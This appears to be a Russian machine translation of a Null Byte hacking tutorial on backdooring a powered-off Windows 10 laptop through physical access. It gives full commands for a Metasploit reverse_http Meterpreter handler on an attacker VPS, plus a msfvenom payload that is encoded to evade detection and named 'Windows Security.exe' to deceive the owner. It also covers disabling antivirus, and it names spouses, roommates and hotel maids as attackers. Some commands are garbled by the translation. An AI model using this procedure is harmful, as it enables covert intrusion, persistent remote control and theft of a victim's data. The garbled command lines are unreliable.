Взлом Windows 10: как взломать чужой компьютер без пароля (настройка полезной нагрузки)

Выключенный ноутбук с Windows 10 может быть взломан менее чем за три минуты. Всего несколькими нажатиями клавиш хакер может удалить все антивирусное программное обеспечение, создать бэкдор и захватывать изображения и пароли веб-камеры, а также другие очень конфиденциальные личные данные.

Вопрос, который вы, вероятно, задаете. прямо сейчас думаю, зачем хакеру делать это на моем ноутбуке? Ответ здесь прост – любой компьютер или онлайн-аккаунт имеет ценность, даже Pinterest вашей мамы. Хотя многие считают, что им нечего терять или нечего скрывать, им не следует недооценивать возможности и причины хакеров.

Взломав ваш компьютер с Windows 10, злоумышленник может превратить его в веб-сервер для фишинг, вредоносное ПО, спам, а также для размещения и распространения другого гнусного контента. Они также могут собирать ваши контакты, спамить других из вашей электронной почты, приобретать виртуальные товары, похищать вашу репутацию, получать все учетные данные вашей учетной записи, использовать ваш компьютер для активности ботов и многое другое.

Даже если есть не являются конфиденциальными данными, хранящимися на устройстве, хакеры по-прежнему могут выполнять незаконные действия , используя взломанное устройство. Любая незаконная деятельность, исходящая от устройства, может быть связана с жертвой, что приведет к крупным штрафам, судебным искам или даже тюремному заключению.

Также разумно учитывать, что скомпрометированный компьютер не является реальной целью хакера. . Если владелец работает в крупном бизнесе или компании, компания может стать настоящей целью злоумышленника. Скомпрометированный компьютер, подключенный к сети компании, будет действовать как устройство проникновения, позволяя злоумышленнику выполнять незаконные действия или переходить на другие устройства в сети.

Понимание атаки

В этой статье я покажу, как хакеры, имеющие физический доступ к целевому компьютеру, могут легко взломать устройство. Это хорошо для белого человека или пентестера, чтобы добавить к своему арсеналу навыков, а также для обычных пользователей, желающих предотвратить подобные атаки.

Без ведома большинства пользователей Windows 10, это возможно для злоумышленников. для просмотра файлов и папок на своем компьютере после его полного выключения – и не зная своего пароля.

Для выполнения этой атаки потребуются два USB-накопителя. USB № 1 будет использоваться для создания «живого USB», который будет загружаться на целевом компьютере, а USB № 2 будет содержать полезную нагрузку, которая позже будет выполнена на целевом устройстве. После создания живого USB-накопителя на первом диске будет невозможно сохранять на нем файлы (т.е. полезную нагрузку), поэтому требуется второй USB-накопитель.

Эта атака может выполняться коллегами, соседями, горничными в отеле, соседями по комнате, друзьями, супругами или кем-либо, у кого есть два USB-накопителя и три минуты физического доступа к целевому компьютеру. Кроме того, злоумышленник сможет взломать целевой компьютер с помощью Metasploit, что упростит поддержание долгосрочного и удаленного подключения к целевому устройству при его перемещении в разные сети Wi-Fi в любой точке мира.

Шаг 1. Создайте Live USB

Live USB – это физический носитель или внешний жесткий диск, содержащий полную операционную систему, которая может быть загружена на компьютер без использования внутренней операционной системы компьютера. Большинство современных портативных и настольных компьютеров поддерживают загрузку с активных USB-устройств без каких-либо соображений безопасности.

К популярным программам, разработанным для создания живых USB-накопителей, относятся Rufus и LinuxLive USB Creator. Тем не менее, я рекомендую Etcher, кроссплатформенную утилиту с открытым исходным кодом, предназначенную для максимально простого создания загрузочных USB-устройств.

Рекомендуется облегченный ISO-образ Linux, поскольку он позволяет Etcher создавать живой USB очень быстро. Любой ISO-образ Linux, позволяющий пользователям опробовать операционную систему без ее установки, будет работать нормально.

Изображение через Etcher

Когда Etcher закончил, извлеките USB из компьютера. Теперь USB-порт можно использовать для просмотра и изменения конфиденциальных файлов на выключенных компьютерах с Windows 10.

Шаг 2. Настройте свой VPS

Для размещения приемника Metasploit требуется виртуальный частный сервер (VPS). Это сервер, к которому скомпрометированное устройство будет подключаться обратно.

Покупка VPS уже много раз описывалась в Null Byte, поэтому я не буду вдаваться в подробности здесь. Если это незнакомая концепция, ознакомьтесь с нашим общим руководством по выбору лучшего провайдера VPS. Для запуска Metasploit достаточно любого VPS на базе Debian с не менее 1024 МБ ОЗУ и 1 ядром ЦП.

Шаг 3. Установите Metasploit на VPS

Разработчики Metasploit создали простой установочный скрипт, который автоматизирует весь процесс установки. Для начала загрузите скрипт установщика и сохраните его в локальный файл, что можно сделать с помощью следующей команды.

curl https://raw.githubusercontent.com/ Rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall

Затем убедитесь, что файл имеет соответствующие разрешения для выполнения на вашем VPS с использованием команду chmod .

sudo chmod 755 msfinstall

Наконец, запустите вновь созданный Файл “msfinstall” от имени пользователя root для установки Metasploit.

sudo ./msfinstall

Установка Metasploit должна завершиться менее чем за две минуты. Сценарий установщика работал без ошибок для меня с использованием Debian 9 VPS.. Для получения информации об установке Metasploit в других дистрибутивах см. Официальные инструкции по установке Rapid7, разработчиков Metasploit.

Шаг 4: Экран установки на VPS

«Экран» – это программа, которая позволяет пользователям управлять несколькими сеансами терминала в одной консоли. Он имеет возможность «отсоединить» или закрыть окно терминала без потери каких-либо данных, запущенных в терминале.

Например, Metasploit должен будет продолжить работу после того, как сеанс SSH на VPS будет завершен. закрыто. Если Metasploit запущен и SSH-терминал немедленно закрыт, Metasploit перестанет работать на VPS. Итак, вы будете использовать Screen, чтобы Metasploit работал в фоновом режиме. Ниже приведен пример GIF, в котором я сохранил nano в сеансе Screen.

Для установки Screen используйте следующую команду apt-get .

sudo apt-get экран установки

Чтобы просмотреть текущие сеансы Screen, используйте следующую команду. Если сеансы экрана не выполняются в фоновом режиме, команда выдаст сообщение «Сокеты не найдены».

screen -list

Чтобы начать новый сеанс экрана, просто введите screen в терминал и нажмите enter .

экран

Экран отобразит некоторую информацию об авторских правах и лицензировании. Снова нажмите клавишу enter и не обращайте на нее внимания. Оказавшись внутри сеанса, все, что происходит внутри терминала, будет сохранено – даже если вы закроете окно терминала или выключите компьютер.

Аргумент -r можно использовать для повторного подключения к запущенному сеансу экрана.

screen -r SESSION-NAME-HERE

Приведенных выше команд должно быть достаточно, чтобы начать работу с Screen и управлять сеансами. Чтобы получить исчерпывающий обзор Screen, ознакомьтесь с публикацией Тибо Руссо на DEV.

Шаг 5: Настройка Metasploit

Metasploit предлагает автоматизацию через «скрипты ресурсов». Это может быть очень удобно для хакеров, которые регулярно используют Metasploit и не хотят вводить одни и те же команды снова и снова для настройки Metasploit.

Чтобы создать сценарий ресурса, используйте nano для создания файла на VPS с помощью следующей команды.

nano ~/automate.rc

Это создаст файл “automate.rc” в домашней папке. Приведенный ниже сценарий необходимо скопировать и вставить в нано-терминал.

использовать multi/handler
установить окна полезной нагрузки/meterpreter/reverse_http
установить LHOST Ваш.VPS.IP. Здесь
установите LPORT 80
установите ExitOnSession false
установите EnableStageEncoding true
exploit -j

Давайте разберем этот сценарий перед тем, как продолжить, чтобы увидеть, что он означает.

  • Используемый тип полезной нагрузки – “windows/ meterpreter/reverse_http. ” Это создаст HTTP-соединение между целевой и атакующей машинами. Злоумышленники иногда используют HTTP-соединения поверх стандартного TCP, чтобы обойти DPI (глубокая проверка пакетов). Пакеты TCP, передающиеся на необычные порты (например, порт 4444, порт 55555 и т. Д.), Могут быть обнаружены любым, кто отслеживает трафик, передаваемый на взломанное устройство и от него.
  • LHOST – это IP-адрес сервера злоумышленника, на котором запущен Metasploit. IP-адрес вашего VPS здесь в файле ресурсов следует изменить на IP-адрес VPS злоумышленника.
  • LPORT указывает порт назначения. По умолчанию данные HTTP передаются через порт 80. Для пассивного обхода DPI использовался порт 80.
  • Этот эксплойт автоматически запускается при запуске файла automate.rc с помощью msfconsole.

Когда вы скопировали текст из приведенной выше цитаты и вставили его в nano, сохраните и закройте nano, нажав Ctrl + X , затем Y , затем введите на клавиатуре.

Теперь Msfconsole можно запустить с помощью следующей команды.

screen msfconsole -r ~/automate.rc

Шаг 6: Создайте полезную нагрузку

Msfvenom – это комбинация Msfpayload и Msfencode, объединяющая оба этих инструмента в единую структуру. Msfvenom – это экземпляр командной строки Metasploit, который используется для генерации и вывода всех различных типов шелл-кода, доступных в Metasploit. В большинстве случаев необработанный шелл-код необходимо закодировать для правильной работы.

  • Не пропустите: как создать необнаруживаемую полезную нагрузку

Во время этого теста использовалась простая и незамысловатая полезная нагрузка Msfvenom. В реальном сценарии злоумышленники будут использовать расширенные полезные нагрузки, которые действуют и эффективно обходят антивирусное программное обеспечение. Если антивирусное программное обеспечение будет удалено во время атаки, базовой полезной нагрузки Msfvenom будет достаточно.

Kali Linux использовался для создания Msfvenom, созданного в этом руководстве. Чтобы сгенерировать полезную нагрузку с помощью Msfvenom, введите следующую команду в терминал.

msfvenom –encoder cmd/powershell_base64 –payload windows/meterpreter/reverse_http LHOST = YourVpsIpHere LPORT = 80 –arch x86 –platform win –format exe –out ~/’Windows Security.exe’

В приведенной выше команде много чего происходит, поэтому позвольте мне разбить ее на части..

  • – encoder : кодирует полезную нагрузку, чтобы можно было обойти системы обнаружения вторжений, изменив подпись файла исходной полезной нагрузки на другую формат. Тип используемого здесь кодировщика – “powershell_base64”. PowerShell – это язык сценариев, разработанный Microsoft, чтобы помочь ИТ-специалистам настраивать системы и автоматизировать административные задачи. Хакеры использовали PowerShell для достижения своих целей с 2006 года, когда он был введен в операционные системы Windows XP и Vista.
  • – -payload : используется тип полезной нагрузки «windows/meterpreter/reverse_http». Эта полезная нагрузка должна соответствовать типу полезной нагрузки, используемому в файле ресурсов automate.rc, созданном на предыдущем шаге.
  • LHOST = YourVpsIpHere : LHOST – это IP-адрес сервера злоумышленника, на котором запущен Metasploit. Этот IP-адрес должен соответствовать LHOST, используемому в файле ресурсов automate.rc, созданном на предыдущем шаге.
  • LPORT = 80 : LPORT указывает порт назначения . Этот номер порта должен соответствовать LPORT, используемому в файле ресурсов automate.rc, созданном на предыдущем шаге.
  • – arch x86 : старые компьютеры с Windows (32 -bit) используют архитектуру x86 и не могут выполнять 64-битные исполняемые файлы. Более новые, 64-битные компьютеры Windows могут использовать архитектуру x86 или x64. Злоумышленникам имеет смысл использовать архитектуры x86 для охвата более широкого круга пользователей Windows.
  • – платформа выигрывает : здесь указывается целевая платформа. Другие платформы включают Android, macOS, Unix и Solaris. В этом примере использовалась платформа “win” (Windows).
  • – format exe : здесь выходной формат был указан как EXE или “исполняемый”. Этот исполняемый файл будет работать на компьютерах Windows без ввода данных пользователем.
  • – out : злоумышленники часто называют вирусы и бэкдоры чем-то правдоподобным, например «Безопасность Windows» ». Центр обновления Windows »или« explorer.exe », чтобы убедить пользователей, что запущенный процесс не является вредоносным или подозрительным. – out определяет имя исполняемой полезной нагрузки.

Шаг 7. Создание USB-накопителя полезной нагрузки.

После создания полезной нагрузки Msfvenom ее необходимо сохранить на второй USB-накопитель. Просто вставьте второй USB-накопитель в компьютер с полезной нагрузкой EXE, а затем перетащите полезную нагрузку на него. Это буквально все, что нужно для создания USB-накопителя с полезной нагрузкой.

Приготовьтесь к использованию системы

В этом руководстве живое USB был создан, Metasploit был установлен и настроен на удаленном сервере, и была создана простая полезная нагрузка Msfvenom.. После всех этих настроек и готовности к работе теперь можно получить доступ к целевому компьютеру в выключенном состоянии, удалить Защитник Windows (и другое программное обеспечение для обеспечения безопасности) и встроить полезную нагрузку в устройство. Полезная нагрузка будет выполняться каждый раз при перезагрузке устройства, создавая новое соединение между взломанным компьютером и сервером злоумышленника.

До следующего раза подписывайтесь на меня в Twitter @tokyoneon_ и GitHub. И, как всегда, оставьте комментарий ниже или напишите мне в Твиттере, если у вас есть вопросы.

Хотите начать зарабатывать деньги как белый хакер? Начните свою хакерскую карьеру с помощью нашего пакета обучения Premium Ethical Hacking Certification Bundle 2020 из нового магазина Null Byte и получите более 60 часов обучения от профессионалов в области кибербезопасности.

Купить сейчас (скидка 90%)>

Фото на обложке Михаила Поленка/123RF; Скриншоты и GIF от tokyoneon/Null Byte (если не указано иное)
Оцените статью
futurei.ru
Добавить комментарий